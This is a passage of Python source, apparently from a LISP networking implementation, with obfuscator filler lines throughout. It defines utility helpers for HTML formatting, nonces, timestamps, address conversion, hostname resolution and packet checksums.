if 33 - 33: I1IiiI . oO0o * OoO0O00 * iIii1I11I1II1
def lisp_print_cour(string):
    """Wrap *string* in a Courier New HTML font tag."""
    return ('<font face="Courier New">{}</font>'.format(string))
if 5 - 5: Oo0Ooo / IiII % O0 . I1Ii111 * IiII
if 83 - 83: OOooOOo
if 12 - 12: i1IIi . i1IIi - o0oOOo0O0Ooo
if 26 - 26: iIii1I11I1II1 % i11iIiiIii % I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
def lisp_print_sans(string):
    """Wrap *string* in a Sans-Serif HTML font tag."""
    return ('<font face="Sans-Serif">{}</font>'.format(string))
if 93 - 93: i1IIi
if 53 - 53: OoooooooOO + Oo0Ooo + oO0o
if 24 - 24: iII111i - IiII - iII111i * I1ii11iIi11i . OoooooooOO / IiII
if 66 - 66: Oo0Ooo
if 97 - 97: i1IIi - OoooooooOO / I1Ii111 * I1IiiI
if 55 - 55: o0oOOo0O0Ooo . iII111i
if 87 - 87: o0oOOo0O0Ooo % iIii1I11I1II1
def lisp_span(string, hover_string):
    """Wrap *string* in an HTML <span> whose tooltip is *hover_string*."""
    return ('<span title="{}">{}</span>'.format(hover_string, string))
if 100 - 100: I1Ii111 . I1IiiI * I1Ii111 - I1IiiI . I11i * Ii1I
if 89 - 89: OoO0O00 + IiII * I1Ii111
if 28 - 28: OoooooooOO . oO0o % I1ii11iIi11i / i1IIi / OOooOOo
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
def lisp_eid_help_hover ( output ) :
    """Wrap *output* in an HTML span whose hover tooltip explains the
    accepted unicast and multicast EID input formats."""
    # Tooltip text shown on mouse-over (verbatim, multi-line).
    OO0o0OO0 = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
    if 56 - 56: i11iIiiIii - Oo0Ooo / iII111i / OoOoOO00
    if 43 - 43: o0oOOo0O0Ooo . iII111i . I11i + iIii1I11I1II1
    OoOOoO0oOo = lisp_span ( output , OO0o0OO0 )
    return ( OoOOoO0oOo )
if 70 - 70: I11i % iIii1I11I1II1 . Oo0Ooo + Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
def lisp_geo_help_hover ( output ) :
    """Wrap *output* in an HTML span whose hover tooltip explains the
    accepted EID, geo-point, and geo-prefix input formats."""
    # Tooltip text shown on mouse-over (verbatim, multi-line).
    OO0o0OO0 = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
    if 84 - 84: i11iIiiIii * OoO0O00
    if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
    OoOOoO0oOo = lisp_span ( output , OO0o0OO0 )
    return ( OoOOoO0oOo )
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
def space(num):
    """Return *num* repetitions of the spacer string (see lisp_space)."""
    return (" " * num)
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
def lisp_get_ephemeral_port():
    """Return a random port from the ephemeral range 32768-65535.

    Fix: randrange(32768, 65535) excluded 65535 because randrange's upper
    bound is exclusive; randint is inclusive on both ends.
    """
    return (random.randint(32768, 65535))
if 47 - 47: o0oOOo0O0Ooo
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
def lisp_get_data_nonce():
    """Return a random 24-bit nonce (0 .. 0xffffff inclusive)."""
    return (random.randrange(0, 0x1000000))
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
def lisp_get_control_nonce():
    """Return a random 64-bit nonce (0 .. 2**64 - 1 inclusive)."""
    return (random.getrandbits(64))
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
def lisp_hex_string(integer_value):
    """Return *integer_value* as lowercase hex without the '0x' prefix.

    Also strips the trailing 'L' that Python 2 appends to long literals.
    """
    text = hex(integer_value)[2:]
    if text.endswith("L"):
        text = text[:-1]
    return (text)
if 61 - 61: o0oOOo0O0Ooo / OoOoOO00 - Oo0Ooo
if 19 - 19: iII111i - o0oOOo0O0Ooo / o0oOOo0O0Ooo + Oo0Ooo
if 98 - 98: iIii1I11I1II1 % OOooOOo + I11i . ooOoO0o
if 99 - 99: O0 + O0 * I11i + O0 * oO0o
if 80 - 80: I1IiiI . Ii1I
if 47 - 47: I11i + ooOoO0o + II111iiii % i11iIiiIii
if 93 - 93: I1ii11iIi11i % OoOoOO00 . O0 / iII111i * oO0o
def lisp_get_timestamp():
    """Return the current wall-clock time in seconds since the epoch."""
    return (time.time())
if 29 - 29: o0oOOo0O0Ooo
if 86 - 86: II111iiii . IiII
if 2 - 2: OoooooooOO
if 60 - 60: OoO0O00
if 81 - 81: OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
def lisp_set_timestamp(seconds):
    """Return an absolute timestamp *seconds* from now."""
    return (time.time() + seconds)
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
def lisp_print_elapsed(ts):
    """Return the time elapsed since timestamp *ts* as 'H:MM:SS' text.

    Returns "never" when ts is 0 or None.
    """
    if (ts == 0 or ts == None): return ("never")

    elapsed = round(time.time() - ts, 0)
    return (str(datetime.timedelta(seconds=elapsed)))
if 77 - 77: O0 . Ii1I
if 39 - 39: ooOoO0o . II111iiii
if 45 - 45: oO0o * OoOoOO00 / iIii1I11I1II1
if 77 - 77: I1Ii111 - I11i
if 11 - 11: I1ii11iIi11i
if 26 - 26: iIii1I11I1II1 * I1Ii111 - OOooOOo
if 27 - 27: I1ii11iIi11i * I1Ii111 - OoO0O00 + Ii1I * Ii1I
def lisp_print_future(ts):
    """Return the time remaining until timestamp *ts* as 'H:MM:SS' text.

    Returns "never" for ts == 0 and "expired" for timestamps in the past.
    """
    if (ts == 0): return ("never")

    remaining = ts - time.time()
    if (remaining < 0): return ("expired")

    remaining = round(remaining, 0)
    return (str(datetime.timedelta(seconds=remaining)))
if 9 - 9: oO0o % i11iIiiIii / Oo0Ooo
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
if 13 - 13: OoO0O00
if 70 - 70: I1Ii111 + O0 . oO0o * Ii1I
if 2 - 2: OoooooooOO . OOooOOo . IiII
if 42 - 42: OOooOOo % oO0o / OoO0O00 - oO0o * i11iIiiIii
if 19 - 19: oO0o * I1IiiI % i11iIiiIii
def lisp_print_eid_tuple(eid, group):
    """Return a printable string for an (EID, group) tuple.

    A null group prints as just the EID prefix; a null or group-equal EID
    prints as "[<iid>](*, <group>)"; otherwise the (S,G) form is used.
    """
    eid_str = eid.print_prefix()
    if (group.is_null()): return (eid_str)

    group_str = group.print_prefix()
    iid = group.instance_id

    if (eid.is_null() or eid.is_exact_match(group)):
        index = group_str.find("]") + 1
        return ("[{}](*, {})".format(iid, group_str[index::]))
    return (eid.print_sg(group))
if 64 - 64: ooOoO0o / O0 * OoOoOO00 * ooOoO0o
if 60 - 60: I11i / i1IIi % I1ii11iIi11i / I1ii11iIi11i * I1ii11iIi11i . i11iIiiIii
if 99 - 99: OoOoOO00
if 77 - 77: o0oOOo0O0Ooo
if 48 - 48: OoOoOO00 % I1ii11iIi11i / I11i . iIii1I11I1II1 * II111iiii
if 65 - 65: OoOoOO00
if 31 - 31: I11i * OoOoOO00 . IiII % Ii1I + Oo0Ooo
if 47 - 47: O0 * I1IiiI * OoO0O00 . II111iiii
def lisp_convert_6to4(addr_str):
    """Strip the IPv4-mapped IPv6 prefix, returning the embedded dotted
    IPv4 address; other strings are returned unchanged."""
    if ("::ffff:" not in addr_str):
        return (addr_str)
    return (addr_str.split(":")[-1])
if 62 - 62: I1ii11iIi11i / I11i . i1IIi
if 99 - 99: OoOoOO00 . I1Ii111
if 59 - 59: I11i / Oo0Ooo / OOooOOo / O0 / OoOoOO00 + o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo % oO0o / I1Ii111 % I1Ii111 % O0
if 90 - 90: IiII . ooOoO0o / iIii1I11I1II1
if 28 - 28: IiII + oO0o - ooOoO0o / iIii1I11I1II1 - I1IiiI
if 45 - 45: O0 / i1IIi * oO0o * OoO0O00
if 35 - 35: I1ii11iIi11i / iII111i % I1IiiI + iIii1I11I1II1
if 79 - 79: OoOoOO00 / ooOoO0o
if 77 - 77: Oo0Ooo
if 46 - 46: I1Ii111
def lisp_convert_4to6(addr_str):
    """Return a lisp_address holding *addr_str* as IPv6, converting a
    dotted IPv4 string to its ::ffff: mapped form first."""
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if (addr.is_ipv4_string(addr_str)):
        addr_str = "::ffff:" + addr_str
    addr.store_address(addr_str)
    return (addr)
if 72 - 72: iII111i * OOooOOo
if 67 - 67: i1IIi
if 5 - 5: II111iiii . OoooooooOO
if 57 - 57: I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
if 33 - 33: I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
def lisp_gethostbyname ( string ) :
    """Resolve *string* to an address string, or return "" on failure.

    Literal addresses are returned unchanged: dotted-decimal (first label
    is a digit) and colon-separated hex (IPv6). Anything else goes
    through DNS: socket.gethostbyname() first, then -- on Alpine, where
    gethostbyname may fail -- socket.getaddrinfo() as a fallback.
    """
    IiiIIi1 = string . split ( "." )
    iI1iIiiI = string . split ( ":" )
    Oo0OOo = string . split ( "-" )
    if 36 - 36: O0 * OoO0O00 % iII111i * iII111i / OoO0O00 * IiII
    # Dotted and starting with a digit -> treat as an IPv4 literal.
    if ( len ( IiiIIi1 ) > 1 ) :
        if ( IiiIIi1 [ 0 ] . isdigit ( ) ) : return ( string )
    if 14 - 14: i1IIi . IiII + O0 * ooOoO0o
    # Colon-separated with a leading hex group -> treat as IPv6 literal.
    if ( len ( iI1iIiiI ) > 1 ) :
        try :
            int ( iI1iIiiI [ 0 ] , 16 )
            return ( string )
        except :
            pass
    if 76 - 76: OoO0O00
    if 92 - 92: I11i - iIii1I11I1II1 % OoooooooOO
    if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
    if 1 - 1: iII111i * OoOoOO00
    if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
    if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
    if 6 - 6: iIii1I11I1II1 * OoooooooOO
    # Three dash-separated fields: probe whether each is hex (MAC-style
    # name). NOTE(review): the loop result is never used -- presumably a
    # MAC string is meant to fall through to DNS anyway; verify.
    if ( len ( Oo0OOo ) == 3 ) :
        for i1i1IIIIIIIi in range ( 3 ) :
            try : int ( Oo0OOo [ i1i1IIIIIIIi ] , 16 )
            except : break
    if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
    if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
    if 69 - 69: I1ii11iIi11i
    # Primary DNS path. On failure, give up unless running on Alpine.
    try :
        O0o00o000oO = socket . gethostbyname ( string )
        return ( O0o00o000oO )
    except :
        if ( lisp_is_alpine ( ) == False ) : return ( "" )
    if 83 - 83: o0oOOo0O0Ooo
    if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
    if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
    if 48 - 48: iII111i + IiII
    if 60 - 60: I11i + iII111i . IiII / i1IIi . iIii1I11I1II1
    # Alpine fallback: getaddrinfo; require the canonical-name field to
    # echo the queried name, then return the sockaddr's address.
    try :
        O0o00o000oO = socket . getaddrinfo ( string , 0 ) [ 0 ]
        if ( O0o00o000oO [ 3 ] != string ) : return ( "" )
        O0o00o000oO = O0o00o000oO [ 4 ] [ 0 ]
    except :
        O0o00o000oO = ""
    if 14 - 14: OOooOOo
    return ( O0o00o000oO )
if 79 - 79: Ii1I
if 76 - 76: iIii1I11I1II1
if 80 - 80: iIii1I11I1II1 . O0 / Ii1I % Ii1I
if 93 - 93: OoooooooOO * Oo0Ooo
if 10 - 10: I1Ii111 * OoooooooOO + I11i - I1ii11iIi11i / I1ii11iIi11i . i11iIiiIii
if 22 - 22: I1Ii111 / o0oOOo0O0Ooo
if 98 - 98: i1IIi
if 51 - 51: I1ii11iIi11i + ooOoO0o + Oo0Ooo / i1IIi + i1IIi
def lisp_ip_checksum(data, hdrlen=20):
    """Compute the IPv4 header checksum over the first *hdrlen* bytes of
    *data* and return the header with the checksum stored at bytes 10-11.

    Packets shorter than hdrlen are logged and returned unmodified. The
    checksum field in *data* is expected to be zero on input.
    """
    if (len(data) < hdrlen):
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return (data)

    #
    # Sum the header as 16-bit words (4 hex digits at a time).
    #
    hexed = binascii.hexlify(data)
    total = sum(int(hexed[j:j + 4], 16) for j in range(0, hdrlen * 2, 4))

    #
    # Fold carries and take the one's complement, in network byte order.
    #
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    #
    # Splice the checksum into bytes 10-11 of the header.
    #
    return (data[0:10] + checksum + data[12::])
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
if 84 - 84: i1IIi
if 42 - 42: II111iiii - OoO0O00 - OoooooooOO . iII111i / OoOoOO00
if 56 - 56: i11iIiiIii - iIii1I11I1II1 . II111iiii
def lisp_icmp_checksum(data):
    """Compute the ICMP checksum and return *data* with it stored at
    bytes 2-3.

    Messages shorter than 36 bytes are logged and returned unmodified.
    The sum covers the first 36 hex digits (18 bytes), matching the
    original implementation; the checksum field is expected to be zero
    on input.
    """
    if (len(data) < 36):
        lprint("ICMP packet too short, length {}".format(len(data)))
        return (data)

    #
    # Sum as 16-bit words (4 hex digits at a time).
    #
    hexed = binascii.hexlify(data)
    total = sum(int(hexed[j:j + 4], 16) for j in range(0, 36, 4))

    #
    # Fold carries and take the one's complement, in network byte order.
    #
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    #
    # Splice the checksum into bytes 2-3 of the message.
    #
    return (data[0:2] + checksum + data[4::])
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
if 100 - 100: I1ii11iIi11i * i11iIiiIii % oO0o / Oo0Ooo / ooOoO0o + I1ii11iIi11i
if 59 - 59: I1Ii111 - IiII
if 14 - 14: iIii1I11I1II1 - iIii1I11I1II1
if 5 - 5: IiII
if 84 - 84: II111iiii * oO0o * II111iiii % IiII / I1IiiI
if 100 - 100: IiII . Ii1I - iIii1I11I1II1 . i11iIiiIii / II111iiii
if 71 - 71: I1Ii111 * Oo0Ooo . I11i
if 49 - 49: IiII * O0 . IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
if 84 - 84: ooOoO0o + i11iIiiIii - OOooOOo * ooOoO0o
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
if 86 - 86: Ii1I
if 29 - 29: iIii1I11I1II1 - OoO0O00 + I1IiiI % iIii1I11I1II1 % OOooOOo
if 84 - 84: IiII + I1ii11iIi11i + Ii1I + iII111i
if 62 - 62: i11iIiiIii + OoOoOO00 + i1IIi
if 69 - 69: OoOoOO00
if 63 - 63: OoO0O00 / OoOoOO00 * iIii1I11I1II1 . I1Ii111
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
def lisp_udp_checksum ( source , dest , data ) :
    """Compute the UDP checksum over an IPv6 pseudo-header plus *data*
    and return *data* with the checksum stored at UDP offset 6-7.

    *source* and *dest* are IPv6 address strings; the pseudo-header is
    source address + dest address + UDP length + UDP protocol number.
    """
    if 3 - 3: OoooooooOO
    if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
    if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
    if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
    # Build the pseudo-header: packed source + dest addresses, then the
    # length and protocol fields in network byte order.
    o0 = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
    Ii = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
    ii1I = socket . htonl ( len ( data ) )
    Ooo000000 = socket . htonl ( LISP_UDP_PROTOCOL )
    Oo00ooOoO = o0 . pack_address ( )
    Oo00ooOoO += Ii . pack_address ( )
    Oo00ooOoO += struct . pack ( "II" , ii1I , Ooo000000 )
    if 100 - 100: i11iIiiIii / i11iIiiIii
    if 89 - 89: iII111i . i11iIiiIii * O0
    if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
    if 27 - 27: OOooOOo
    # Hexlify pseudo-header + payload and pad to a 16-bit-word boundary.
    # len(hex string) is always even, so the remainder is 0 or 2 and
    # appending that many "0" digits completes the final word.
    O0OO0ooO00 = binascii . hexlify ( Oo00ooOoO + data )
    oO0 = len ( O0OO0ooO00 ) % 4
    for i1i1IIIIIIIi in range ( 0 , oO0 ) : O0OO0ooO00 += "0"
    if 92 - 92: II111iiii
    if 45 - 45: O0 % I1IiiI - iII111i . OoO0O00
    if 42 - 42: iII111i / o0oOOo0O0Ooo + Oo0Ooo . Oo0Ooo % OOooOOo
    if 16 - 16: i1IIi + OoO0O00 % OoOoOO00 + Ii1I * Oo0Ooo
    # Sum as 16-bit words (4 hex digits at a time).
    i1I1iI = 0
    for i1i1IIIIIIIi in range ( 0 , len ( O0OO0ooO00 ) , 4 ) :
        i1I1iI += int ( O0OO0ooO00 [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] , 16 )
    if 3 - 3: i11iIiiIii
    if 81 - 81: I1IiiI . OoooooooOO * Ii1I . oO0o - O0 * oO0o
    if 72 - 72: II111iiii - OOooOOo + I1IiiI - I11i
    if 91 - 91: II111iiii
    if 53 - 53: OoO0O00 % o0oOOo0O0Ooo / OOooOOo % IiII % OoO0O00 % OoooooooOO
    # Fold carries and take the one's complement, in network byte order.
    i1I1iI = ( i1I1iI >> 16 ) + ( i1I1iI & 0xffff )
    i1I1iI += i1I1iI >> 16
    i1I1iI = socket . htons ( ~ i1I1iI & 0xffff )
    if 31 - 31: I1IiiI
    if 73 - 73: ooOoO0o . O0 / o0oOOo0O0Ooo - OoooooooOO % i11iIiiIii
    if 80 - 80: Ii1I / ooOoO0o % O0 . Oo0Ooo
    if 63 - 63: OOooOOo . II111iiii . I11i
    # Splice the checksum into bytes 6-7 of the UDP header.
    i1I1iI = struct . pack ( "H" , i1I1iI )
    O0OO0ooO00 = data [ 0 : 6 ] + i1I1iI + data [ 8 : : ]
    return ( O0OO0ooO00 )
if 46 - 46: ooOoO0o % IiII - o0oOOo0O0Ooo - Oo0Ooo - Ii1I / I11i
if 68 - 68: i1IIi - I1ii11iIi11i / Oo0Ooo % I11i . iII111i
if 9 - 9: IiII
if 48 - 48: o0oOOo0O0Ooo + o0oOOo0O0Ooo - Oo0Ooo
if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
if 83 - 83: iIii1I11I1II1
if 72 - 72: I11i
if 87 - 87: i1IIi
def lisp_igmp_checksum(igmp):
    """Compute the IGMP checksum and return *igmp* with it stored at
    bytes 2-3.

    The sum covers the first 24 hex digits (12 bytes), matching the
    original implementation; the checksum field is expected to be zero
    on input.
    """
    #
    # Sum as 16-bit words (4 hex digits at a time).
    #
    hexed = binascii.hexlify(igmp)
    total = sum(int(hexed[j:j + 4], 16) for j in range(0, 24, 4))

    #
    # Fold carries and take the one's complement, in network byte order.
    #
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    checksum = struct.pack("H", socket.htons(~total & 0xffff))

    #
    # Splice the checksum into bytes 2-3 of the message.
    #
    return (igmp[0:2] + checksum + igmp[4::])
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
def lisp_get_interface_address ( device ) :
    """Return the first IPv4 address configured on *device* as a
    lisp_address, or None when the device or an IPv4 address is absent.

    Note: uses dict.has_key(), so this code targets Python 2.
    """
    if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
    if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
    if 36 - 36: OOooOOo % i11iIiiIii
    if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
    if ( device not in netifaces . interfaces ( ) ) : return ( None )
    if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
    if 83 - 83: I1ii11iIi11i * I1ii11iIi11i + OOooOOo
    if 57 - 57: O0 - O0 . I1ii11iIi11i / o0oOOo0O0Ooo / Ii1I
    if 20 - 20: OOooOOo * II111iiii - OoOoOO00 - oO0o * I1Ii111
    I1i1II1 = netifaces . ifaddresses ( device )
    if ( I1i1II1 . has_key ( netifaces . AF_INET ) == False ) : return ( None )
    if 89 - 89: OoO0O00 / OoO0O00
    if 1 - 1: I1ii11iIi11i . i11iIiiIii
    if 74 - 74: O0 + OoooooooOO / oO0o / OoOoOO00 . I1ii11iIi11i % oO0o
    if 34 - 34: i1IIi . I1IiiI
    i11I1IIiiii = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
    if 85 - 85: iIii1I11I1II1
    # Returns inside the first iteration -- only the first AF_INET
    # address on the device is ever considered.
    for O0o00o000oO in I1i1II1 [ netifaces . AF_INET ] :
        oOo0O = O0o00o000oO [ "addr" ]
        i11I1IIiiii . store_address ( oOo0O )
        return ( i11I1IIiiii )
    if 30 - 30: Ii1I . I1ii11iIi11i / OOooOOo
    return ( None )
if 2 - 2: IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
def lisp_get_input_interface ( packet ) :
    """Return (device-list, source-mac, dest-mac, my-sa) for a raw frame.

    The first 12 bytes of *packet* hold the Ethernet destination and
    source MACs; both are rendered as 12-hex-digit strings (presumably
    via lisp_format_packet -- verify) and looked up in the global
    lisp_mymacs table (MAC string -> list of local device names).
    my-sa is True when the *source* MAC is one of ours.
    """
    OOOO = lisp_format_packet ( packet [ 0 : 12 ] ) . replace ( " " , "" )
    oO = OOOO [ 0 : 12 ]
    Iii11111iiI = OOOO [ 12 : : ]
    if 67 - 67: o0oOOo0O0Ooo
    # Is the frame's source MAC one of this system's MACs?
    try : OOOoO00O = lisp_mymacs . has_key ( Iii11111iiI )
    except : OOOoO00O = False
    if 27 - 27: I1ii11iIi11i * i1IIi . i1IIi
    # Prefer a device match on the destination MAC, then on the source
    # MAC; otherwise report an unknown device ("?").
